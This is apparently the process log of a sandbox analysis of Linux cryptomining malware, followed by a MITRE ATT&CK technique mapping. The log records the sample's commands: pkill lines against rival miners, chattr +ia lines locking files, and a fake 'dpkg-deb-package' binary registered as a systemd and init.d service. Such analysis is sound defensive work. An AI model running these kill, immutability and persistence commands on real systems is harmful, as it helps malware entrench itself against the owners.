  - Reads CPU attributes
  - Reads runtime system information
  PID:2668
- /bin/pkill
  pkill -9 -f kinsing
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2669
- /bin/pkill
  pkill -9 -f sshpass
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2670
- /bin/pkill
  pkill -9 -f sshexec
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2671
- /bin/pkill
  pkill -9 -f cnrig
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2672
- /bin/pkill
  pkill -9 -f attack
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2673
- /bin/pkill
  pkill -9 -f dovecat
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2674
- /bin/pkill
  pkill -9 -f javae
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2675
- /bin/pkill
  pkill -9 -f donate
  2⤵
  - Reads CPU attributes
  PID:2676
- /bin/pkill
  pkill -9 -f "scan\\.log"
  2⤵
  PID:2677
- /bin/pkill
  pkill -9 -f xmr-stak
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2678
- /bin/pkill
  pkill -9 -f crond64
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2679
- /bin/pkill
  pkill -9 -f stratum
  2⤵
  - Reads CPU attributes
  PID:2680
- /bin/pkill
  pkill -9 -f /tmp/java
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2692
- /bin/pkill
  pkill -9 -f pastebin
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2693
- /bin/pkill
  pkill -9 -f "/tmp/\\."
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2694
- /bin/pkill
  pkill -9 -f "so\\.txt"
  2⤵
  - Reads CPU attributes
  PID:2695
- /bin/pkill
  pkill -9 -f "bash -s 3673"
  2⤵
  - Reads runtime system information
  PID:2696
- /bin/pkill
  pkill -9 -f 8005/cc5
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2697
- /bin/pkill
  pkill -9 -f /tmp/system
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2698
- /bin/pkill
  pkill -9 -f "\\./cliented"
  2⤵
  - Reads runtime system information
  PID:2699
- /bin/pkill
  pkill -9 -f "\\.inis"
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2700
- /bin/pkill
  pkill -9 -f certutil
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2701
- /bin/pkill
  pkill -9 -f excludefile
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2708
- /bin/pkill
  pkill -9 -f agettyd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2709
- /bin/pkill
  pkill -9 -f kthreaddkk
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2710
- /bin/pkill
  pkill -9 -f /dev/shm
  2⤵
  - Reads CPU attributes
  PID:2711
- /bin/pkill
  pkill -9 -f /var/tmp
  2⤵
  - Reads CPU attributes
  PID:2712
- /bin/pkill
  pkill -9 -f "\\./python"
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2713
- /bin/pkill
  pkill -9 -f "\\./crun"
  2⤵
  PID:2714
- /bin/pkill
  pkill -9 -f "bash -s kthreaddk"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2715
- /bin/pkill
  pkill -9 -f "\\./\\."
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2716
- /bin/pkill
  pkill -9 -f "118/cf\\.sh"
  2⤵
  - Reads CPU attributes
  PID:2717
- /bin/pkill
  pkill -9 -f "\\./lin64"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2718
- /bin/pkill
  pkill -9 -f "confluence/install\\.sh"
  2⤵
  - Reads runtime system information
  PID:2719
- /bin/pkill
  pkill -9 -f "unls64\\.sh"
  2⤵
  PID:2720
- /bin/pkill
  pkill -9 -f "\\./system-xfwm4-session"
  2⤵
  - Reads CPU attributes
  PID:2721
- /bin/pkill
  pkill -9 -f "\\./httpd"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2722
- /bin/pkill
  pkill -9 -f xmrig
  2⤵
  PID:2723
- /bin/pkill
  pkill -9 -f kthreaddi
  2⤵
  PID:2724
- /bin/pkill
  pkill -9 -f loligang
  2⤵
  - Reads CPU attributes
  PID:2725
- /bin/pkill
  pkill -9 -f kthreaddw
  2⤵
  - Reads CPU attributes
  PID:2726
- /bin/pkill
  pkill -9 -f "\\.6379"
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2727
- /bin/pkill
  pkill -9 -f "load\\.sh"
  2⤵
  - Reads CPU attributes
  PID:2728
- /bin/pkill
  pkill -9 -f "init\\.sh"
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2729
- /bin/pkill
  pkill -9 -f "solr\\.sh"
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2730
- /bin/pkill
  pkill -9 -f "\\.rsyslogds"
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2731
- /bin/pkill
  pkill -9 -f sysDworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2732
- /bin/pkill
  pkill -9 -f pnscan
  2⤵
  - Reads CPU attributes
  PID:2733
- /bin/pkill
  pkill -9 -f masscan
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2734
- /bin/pkill
  pkill -9 -f juiceSSH
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2735
- /bin/pkill
  pkill -9 -f sysguard
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2736
- /bin/pkill
  pkill -9 -f kdevtmpfsi
  2⤵
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2737
- /bin/pkill
  pkill -9 -f solrd
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2738
- /bin/pkill
  pkill -9 -f polska
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2739
- /bin/pkill
  pkill -9 -f meminitsrv
  2⤵
  - Reads CPU attributes
  PID:2740
- /bin/pkill
  pkill -9 -f networkservice
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2741
- /bin/pkill
  pkill -9 -f sysupdate
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2742
- /bin/pkill
  pkill -9 -f phpguard
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2743
- /bin/pkill
  pkill -9 -f phpupdate
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2744
- /bin/pkill
  pkill -9 -f networkmanager
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2745
- /bin/pkill
  pkill -9 -f knthread
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2746
- /bin/pkill
  pkill -9 -f mysqlserver
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2747
- /bin/pkill
  pkill -9 -f gitlabkill
  2⤵
  - Reads CPU attributes
  PID:2748
- /bin/pkill
  pkill -9 -f watchbog
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2749
- /bin/pkill
  pkill -9 -f zgrab
  2⤵
  - Reads CPU attributes
  PID:2750
- /bin/pkill
  pkill -9 -f kthreaddk
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:2751
- /bin/pkill
  pkill -9 -f ksoftriqd
  2⤵
  - Enumerates kernel/hardware configuration
  PID:2752
- /bin/pkill
  pkill -9 -f kinsing
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2753
- /bin/pkill
  pkill -9 -f kdevtmpfsi
  2⤵
  - Reads CPU attributes
  PID:2754
- /bin/pkill
  pkill -9 -f unifiw
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2755
- /bin/pkill
  pkill -9 -f kthreaddi
  2⤵
  PID:2756
- /bin/pkill
  pkill -9 -f "\\./systemd"
  2⤵
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2757
- /bin/pkill
  pkill -9 -f /tmp/.ICEd-unix/unifiw
  2⤵
  PID:2758
- /bin/chattr
  chattr +ia /etc/init.d/dpkg-deb-package
  2⤵
  - Attempts to change immutable files
  PID:2759
- /etc/init.d/dpkg-deb-package
  /etc/init.d/dpkg-deb-package start
  2⤵
  - Executes dropped EXE
  PID:2760
- - /bin/cp
    cp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package
    3⤵
    PID:2761
- - /bin/rm
    rm -rf -- dpkg-deb-package
    3⤵
    PID:2763
- - /bin/nohup
    nohup ./dpkg-deb-package
    3⤵
    PID:2762
- - /usr/bin/dpkg-deb-package
    ./dpkg-deb-package
    3⤵
    PID:2762
- /bin/chattr
  chattr +ia /etc/systemd/system/dpkg-deb-package.service
  2⤵
  - Attempts to change immutable files
  PID:2764
- /bin/systemctl
  systemctl daemon-reload
  2⤵
  PID:2765
- /bin/systemctl
  systemctl enable dpkg-deb-package.service
  2⤵
  PID:2889
- - /bin/getopt
    getopt -o r: --long root: -- enable dpkg-deb-package
    3⤵
    PID:2891
- - /usr/sbin/update-rc.d
    /usr/sbin/update-rc.d dpkg-deb-package defaults
    3⤵
    PID:2892
  - - /bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:2893
- - /usr/sbin/update-rc.d
    /usr/sbin/update-rc.d dpkg-deb-package enable
    3⤵
    PID:3017
  - - /bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3018
- /bin/chattr
  chattr +ia .bash_profile
  2⤵
  - Attempts to change immutable files
  PID:3267
- /bin/chattr
  chattr +ia /bin/dpkg-debian
  2⤵
  - Attempts to change immutable files
  PID:3268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Shared Modules

T1129

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Create or Modify System Process

T1543

Systemd Service

T1543.002

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Scheduled Task/Job

T1053

Cron

Defense Evasion

Hijack Execution Flow

T1574

Dynamic Linker Hijacking

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

Process Discovery

T1057

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks